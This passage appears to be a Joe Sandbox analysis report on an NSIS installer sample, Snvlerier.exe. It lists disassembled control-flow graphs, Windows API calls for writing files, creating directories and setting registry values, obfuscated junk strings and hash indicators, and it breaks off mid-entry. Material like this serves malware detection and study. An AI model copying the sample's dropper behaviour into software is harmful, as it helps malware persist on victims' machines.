                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Snvlerier.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Snvlerier.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                              • API String ID: 2803837635-3210132759
                                              • Opcode ID: 1a18c1a60b822dc031fa1a31625828adf1ba426c65e8bffba61e85825231cfca
                                              • Instruction ID: 7c90aca17dc4dadd21d1ca87481e37b15ad9b9abb7bdaf158b10741ac162785b
                                              • Opcode Fuzzy Hash: 1a18c1a60b822dc031fa1a31625828adf1ba426c65e8bffba61e85825231cfca
                                              • Instruction Fuzzy Hash: A261D371A40205ABDB209F64DE8AB9A7BB4FB04315F20403BF915B72C1D7BC9E858B5C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 541 40173f-401762 call 402a07 call 405807 546 401764-40176a call 405ced 541->546 547 40176c-40177e call 405ced call 40579a lstrcatA 541->547 552 401783-401789 call 405f58 546->552 547->552 557 40178e-401792 552->557 558 401794-40179e call 405ff1 557->558 559 4017c5-4017c8 557->559 566 4017b0-4017c2 558->566 567 4017a0-4017ae CompareFileTime 558->567 561 4017d0-4017ec call 40599b 559->561 562 4017ca-4017cb call 405976 559->562 569 401864-40188d call 404ffa call 402f29 561->569 570 4017ee-4017f1 561->570 562->561 566->559 567->566 583 401895-4018a1 SetFileTime 569->583 584 40188f-401893 569->584 572 4017f3-401835 call 405ced * 2 call 405d0f call 405ced call 40551e 570->572 573 401846-401850 call 404ffa 570->573 572->557 604 40183b-40183c 572->604 585 401859-40185f 573->585 588 4018a7-4018b2 CloseHandle 583->588 584->583 584->588 586 4028a5 585->586 589 4028a7-4028ab 586->589 591 4018b8-4018bb 588->591 592 40289c-40289f 588->592 594 4018d0-4018d3 call 405d0f 591->594 595 4018bd-4018ce call 405d0f lstrcatA 591->595 592->586 601 4018d8-402229 call 40551e 594->601 595->601 601->589 604->585 606 40183e-40183f 604->606 606->573
                                              APIs
                                              • lstrcatA.KERNEL32(00000000,00000000,%Piprine%\Krybbes\billetkbs,C:\Users\user\AppData\Local\Temp\carinal\Coracosteon,00000000,00000000,00000031), ref: 0040177E
                                              • CompareFileTime.KERNEL32(-00000014,?,%Piprine%\Krybbes\billetkbs,%Piprine%\Krybbes\billetkbs,00000000,00000000,%Piprine%\Krybbes\billetkbs,C:\Users\user\AppData\Local\Temp\carinal\Coracosteon,00000000,00000000,00000031), ref: 004017A8
                                                • Part of subcall function 00405CED: lstrcpynA.KERNEL32(?,?,00000400,004032BD,Nonchaotically Setup,NSIS Error), ref: 00405CFA
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000,?), ref: 00405033
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(00402C5B,0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000), ref: 00405043
                                                • Part of subcall function 00404FFA: lstrcatA.KERNEL32(0041FCC0,00402C5B,00402C5B,0041FCC0,00000000,00000000,00000000), ref: 00405056
                                                • Part of subcall function 00404FFA: SetWindowTextA.USER32(0041FCC0,0041FCC0), ref: 00405068
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040508E
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050A8
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: %Piprine%\Krybbes\billetkbs$C:\Users\user\AppData\Local\Temp\carinal\Coracosteon
                                              • API String ID: 1941528284-898885171
                                              • Opcode ID: b3af5b1f1ca511c675c6d6fdd13cdd12d6547ae0f08f21c1dd98ce92f77cd670
                                              • Instruction ID: cd7f034680404fd4750a7dd3534fc2dbe8364ba20baf7cfe527146c7ed5fb2e2
                                              • Opcode Fuzzy Hash: b3af5b1f1ca511c675c6d6fdd13cdd12d6547ae0f08f21c1dd98ce92f77cd670
                                              • Instruction Fuzzy Hash: D041D731900515BBDB10BBA5DD46EAF3979EF05368F30823BF522F10E1D63C4A419A6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 608 402f29-402f38 609 402f56-402f61 call 403054 608->609 610 402f3a-402f50 SetFilePointer 608->610 613 402f67-402f81 ReadFile 609->613 614 40304d-403051 609->614 610->609 615 402f87-402f8a 613->615 616 40304a 613->616 615->616 617 402f90-402fa3 call 403054 615->617 618 40304c 616->618 617->614 621 402fa9-402fac 617->621 618->614 622 403019-40301f 621->622 623 402fae-402fb1 621->623 624 403021 622->624 625 403024-403037 ReadFile 622->625 626 403045-403048 623->626 627 402fb7 623->627 624->625 625->616 628 403039-403042 625->628 626->614 629 402fbc-402fc4 627->629 628->626 630 402fc6 629->630 631 402fc9-402fdb ReadFile 629->631 630->631 631->616 632 402fdd-402fe0 631->632 632->616 633 402fe2-402ff7 WriteFile 632->633 634 403015-403017 633->634 635 402ff9-402ffc 633->635 634->618 635->634 636 402ffe-403011 635->636 636->629 637 403013 636->637 637->626
                                              APIs
                                              • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402ED5,000000FF,00000000,00000000,00409130,000463E4), ref: 00402F50
                                              • ReadFile.KERNELBASE(00409130,00000004,000463E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402ED5,000000FF,00000000,00000000,00409130), ref: 00402F7D
                                              • ReadFile.KERNELBASE(privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,00004000,000463E4,00000000,00409130,?,00402ED5,000000FF,00000000,00000000,00409130,000463E4), ref: 00402FD7
                                              • WriteFile.KERNELBASE(00000000,privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,000463E4,000000FF,00000000,?,00402ED5,000000FF,00000000,00000000,00409130,000463E4), ref: 00402FEF
                                              Strings
                                              • privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone, xrefs: 00402FB7, 00402FD0, 00402FEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$Read$PointerWrite
                                              • String ID: privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone
                                              • API String ID: 2113905535-4172010041
                                              • Opcode ID: b29950bdc68b5faf89e6b187db39e57cb9b73b2676aed1925874f4d2d7def943
                                              • Instruction ID: 13bd1e09fd3ff1109fdb922228f0c13217d388e61545931208af93e8e899e07d
                                              • Opcode Fuzzy Hash: b29950bdc68b5faf89e6b187db39e57cb9b73b2676aed1925874f4d2d7def943
                                              • Instruction Fuzzy Hash: B1315671941209EBDF21CF56DD44A9E3FB8EB84761F20803AF504E6191D2389F41EB69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 638 403054-40307d GetTickCount 639 403083-4030ae call 403202 SetFilePointer 638->639 640 4031be-4031c6 call 402be4 638->640 645 4030b3-4030c5 639->645 646 4031c8-4031cd 640->646 647 4030c7 645->647 648 4030c9-4030d7 call 4031d0 645->648 647->648 651 4031b0-4031b3 648->651 652 4030dd-4030e9 648->652 651->646 653 4030ef-4030f5 652->653 654 403120-40313c call 406118 653->654 655 4030f7-4030fd 653->655 661 4031b9 654->661 662 40313e-403146 654->662 655->654 656 4030ff-40311f call 402be4 655->656 656->654 663 4031bb-4031bc 661->663 664 403148-40315e WriteFile 662->664 665 40317a-403180 662->665 663->646 666 403160-403164 664->666 667 4031b5-4031b7 664->667 665->661 668 403182-403184 665->668 666->667 669 403166-403172 666->669 667->663 668->661 670 403186-403199 668->670 669->653 671 403178 669->671 670->645 672 40319f-4031ae SetFilePointer 670->672 671->670 672->640
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00403069
                                                • Part of subcall function 00403202: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EAE,000463E4), ref: 00403210
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F5F,00000004,00000000,00000000,00000000,?,?,?,00402ED5,000000FF,00000000), ref: 0040309C
                                              • WriteFile.KERNELBASE(0040B088,0040D9DD,00000000,00000000,privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,00004000,?,00000000,?,00402F5F,00000004,00000000,00000000,00000000,?,?), ref: 00403156
                                              • SetFilePointer.KERNELBASE(0015ED5E,00000000,00000000,privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,00004000,?,00000000,?,00402F5F,00000004,00000000,00000000,00000000,?,?), ref: 004031A8
                                              Strings
                                              • privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone, xrefs: 004030C9, 004030CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$Pointer$CountTickWrite
                                              • String ID: privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone
                                              • API String ID: 2146148272-4172010041
                                              • Opcode ID: 44e8b817ebb8343b08d1b81ec28155036ecc678ced0031b04218c914520cfb41
                                              • Instruction ID: c1b262e9d874bf3da07316427a7e1cf5d0fab6bf3161e3e5cb8cc28fd74e9c50
                                              • Opcode Fuzzy Hash: 44e8b817ebb8343b08d1b81ec28155036ecc678ced0031b04218c914520cfb41
                                              • Instruction Fuzzy Hash: 4741CD72904202DBCB108F29FD809673FB8F748356715813BE514BA2E1D7389A499BAD

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 673 4015b3-4015c6 call 402a07 call 405833 678 4015c8-4015e3 call 4057c5 CreateDirectoryA 673->678 679 40160a-40160d 673->679 688 401600-401608 678->688 689 4015e5-4015f0 GetLastError 678->689 680 401638-40217f call 401423 679->680 681 40160f-40162a call 401423 call 405ced SetCurrentDirectoryA 679->681 694 40289c-4028ab 680->694 695 40266d-402674 680->695 681->694 698 401630-401633 681->698 688->678 688->679 692 4015f2-4015fb GetFileAttributesA 689->692 693 4015fd 689->693 692->688 692->693 693->688 695->694 698->694
                                              APIs
                                                • Part of subcall function 00405833: CharNextA.USER32(?,?,004218E8,?,0040589F,004218E8,004218E8,?,?,74DF2EE0,004055EA,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405841
                                                • Part of subcall function 00405833: CharNextA.USER32(00000000), ref: 00405846
                                                • Part of subcall function 00405833: CharNextA.USER32(00000000), ref: 0040585A
                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\carinal\Coracosteon,00000000,00000000,000000F0), ref: 00401622
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\carinal\Coracosteon, xrefs: 00401617
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                              • String ID: C:\Users\user\AppData\Local\Temp\carinal\Coracosteon
                                              • API String ID: 3751793516-979337295
                                              • Opcode ID: b11690a117c287e5e772f272b1f08bd2216f98e056d2e024f9db2b7f219d0118
                                              • Instruction ID: c29ff6bcdfa9169bd38c5e24837c02355454d33cc567fa9be724f8895923dab7
                                              • Opcode Fuzzy Hash: b11690a117c287e5e772f272b1f08bd2216f98e056d2e024f9db2b7f219d0118
                                              • Instruction Fuzzy Hash: 32112931908150ABDB213F755D04E6F77B4AA55365724073FF491B22D2C63C0942DA2E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 700 4059ca-4059d4 701 4059d5-405a00 GetTickCount GetTempFileNameA 700->701 702 405a02-405a04 701->702 703 405a0f-405a11 701->703 702->701 704 405a06 702->704 705 405a09-405a0c 703->705 704->705
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 004059DE
                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Snvlerier.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-940993664
                                              • Opcode ID: 36f2bf91e5f174973bf492e97a0146b37235fadad89bfb838cecbf8cbb0c8d40
                                              • Instruction ID: 1a290dde83657723d5dc8d740963070f29eeb8a707195267a4acbd0155ecc67b
                                              • Opcode Fuzzy Hash: 36f2bf91e5f174973bf492e97a0146b37235fadad89bfb838cecbf8cbb0c8d40
                                              • Instruction Fuzzy Hash: C2F082367082446BEB108F56DC44BDB7B98EF91760F10C037F944EB1C1D6B49954CB69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 706 406118-40613b 707 406145-406148 706->707 708 40613d-406140 706->708 710 40614b-406154 707->710 709 406b65-406b69 708->709 711 406b62 710->711 712 40615a 710->712 711->709 713 406161-406165 712->713 714 4062a1-406948 712->714 715 406206-40620a 712->715 716 406276-40627a 712->716 717 40616b-406178 713->717 718 406b4d-406b60 713->718 726 406962-406978 714->726 727 40694a-406960 714->727 722 406210-406229 715->722 723 406ab6-406ac0 715->723 719 406280-406294 716->719 720 406ac5-406acf 716->720 717->711 724 40617e-4061c4 717->724 718->709 725 406297-40629f 719->725 720->718 728 40622c-406230 722->728 723->718 729 4061c6-4061ca 724->729 730 4061ec-4061ee 724->730 725->714 725->716 731 40697b-406982 726->731 727->731 728->715 732 406232-406238 728->732 733 4061d5-4061e3 GlobalAlloc 729->733 734 4061cc-4061cf GlobalFree 729->734 735 4061f0-4061fa 730->735 736 4061fc-406204 730->736 737 406984-406988 731->737 738 4069a9-4069b5 731->738 739 406262-406274 732->739 740 40623a-406241 732->740 733->711 741 4061e9 733->741 734->733 735->735 735->736 736->728 742 406b37-406b41 737->742 743 40698e-4069a6 737->743 738->710 739->725 745 406243-406246 GlobalFree 740->745 746 40624c-40625c GlobalAlloc 740->746 741->730 742->718 743->738 745->746 746->711 746->739
                                              Strings
                                              • privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone, xrefs: 00406122
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone
                                              • API String ID: 0-4172010041
                                              • Opcode ID: 6ed98858e50baa4fc8ccb2f353777cab2dad8f16cd3f92f84c15d381444859a8
                                              • Instruction ID: c487e9e2dd81fc3aadfb1e04cde46090e2f794052fe600adff516df849c50dca
                                              • Opcode Fuzzy Hash: 6ed98858e50baa4fc8ccb2f353777cab2dad8f16cd3f92f84c15d381444859a8
                                              • Instruction Fuzzy Hash: A6816671D04228DBDF24CFA8C8447ADBBB0FB45305F15816AD856BB2C1C7786A96DF44

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 747 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 754 402366-40236e 747->754 755 40289c-4028ab 747->755 757 402370-40237d call 402a07 lstrlenA 754->757 758 40237e-402381 754->758 757->758 761 402391-402394 758->761 762 402383-402390 call 4029ea 758->762 765 4023a5-4023b9 RegSetValueExA 761->765 766 402396-4023a0 call 402f29 761->766 762->761 769 4023bb 765->769 770 4023be-402494 RegCloseKey 765->770 766->765 769->770 770->755
                                              APIs
                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402358
                                              • lstrlenA.KERNEL32(0040A3B0,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402378
                                              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A3B0,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023B1
                                              • RegCloseKey.ADVAPI32(?,?,?,0040A3B0,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040248E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID:
                                              • API String ID: 1356686001-0
                                              • Opcode ID: fa0e6a3f5de01f6ac5f73feb049ba991e25728aedb1cfafa8d7eba0006f2e084
                                              • Instruction ID: 1390060df94e5cc0f841e322960b9bee88c1f255580fc67ae2218552b6815d91
                                              • Opcode Fuzzy Hash: fa0e6a3f5de01f6ac5f73feb049ba991e25728aedb1cfafa8d7eba0006f2e084
                                              • Instruction Fuzzy Hash: 9F117F71E00108BFEB20EFB5DE89EAF7678EB44358F10403AF905B71D0D6B95D019A69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 855 404f6e-404f7c 856 404f92-404f98 855->856 857 404f7e-404f82 855->857 860 404fba 856->860 861 404f9a-404fa5 IsWindowVisible 856->861 858 404f84-404f90 call 404049 857->858 859 404fdd 857->859 866 404ff4-404ff7 858->866 862 404fe0-404fee CallWindowProcA 859->862 865 404fbd-404fc3 860->865 861->859 864 404fa7-404fb8 call 4048c5 861->864 862->866 864->865 865->862 869 404fc5-404fcb 865->869 869->862 871 404fcd-404fdb call 404945 869->871 871->862
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00404F9D
                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404FEE
                                                • Part of subcall function 00404049: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 0040405B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: bdcd993299ab974859bf4a5b99dd808465f3afd7348d138fe856e2dad3a7fbbc
                                              • Instruction ID: 6c93cdea65ccad97de47d38edfcf1efdefe6a9cca5db4b72e3616c49b7a5e3dc
                                              • Opcode Fuzzy Hash: bdcd993299ab974859bf4a5b99dd808465f3afd7348d138fe856e2dad3a7fbbc
